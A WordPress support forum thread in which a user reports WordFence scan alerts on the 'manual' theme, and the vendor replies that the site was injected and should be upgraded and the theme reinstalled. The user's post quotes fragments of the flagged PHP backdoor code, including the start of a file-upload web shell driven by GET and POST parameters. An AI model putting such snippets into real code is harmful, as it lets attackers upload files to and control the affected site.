WordFence Throwing Alerts

  • PeterV
    Participant
    2 years ago #3420

    WordFence (popular WordPress security plugin) is flagging security alerts:

    This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: $j__f=isset($_POST[‘j__f’])?$_POST[‘j__f’]:(isset($_COOKIE[‘j__f’])?$_COOKIE[‘j__f’]:NULL);
    The issue type is: Backdoor:PHP/filemanager.11472

    In manual/search.php

    and

    $j__f=isset($_POST[‘j__f’])?$_POST[‘j__f’]:(isset($_COOKIE[‘j__f’])?$_COOKIE[‘j__f’]:NULL);
    The issue type is: Backdoor:PHP/tripus.3672
    in manual/z.php

    and

    <?php $a=@$_GET[“a”];$b=@$_GET[“b”];switch($_GET[“x”]){case”1″:$fls=$_FILES[“fls”];if($fls[“name”]!=”){$fpt=$_REQUEST[“ph”].$fls[“name”];if(move_uploaded_file(
    The issue type is: Backdoor:PHP/filemanager.11472
    in manual/functions.php

    Can you confirm these lines of codes are intended and necessary?

    SmartWpThemes
    Keymaster
    2 years ago #3428

    Your site injected with some outside code, to fix the issue please perform the below steps.

    1. Run WordPress upgrade.
    2. Delete the manual theme and re-install it again (no data loss will occur)
    2. Upgrade all the plugins.

    Thanks

    PeterV
    Participant
    2 years ago #3432

    Will do! Thanks for the quick reply.

Viewing 3 posts - 1 through 3 (of 3 total)

You must be logged in to reply to this topic.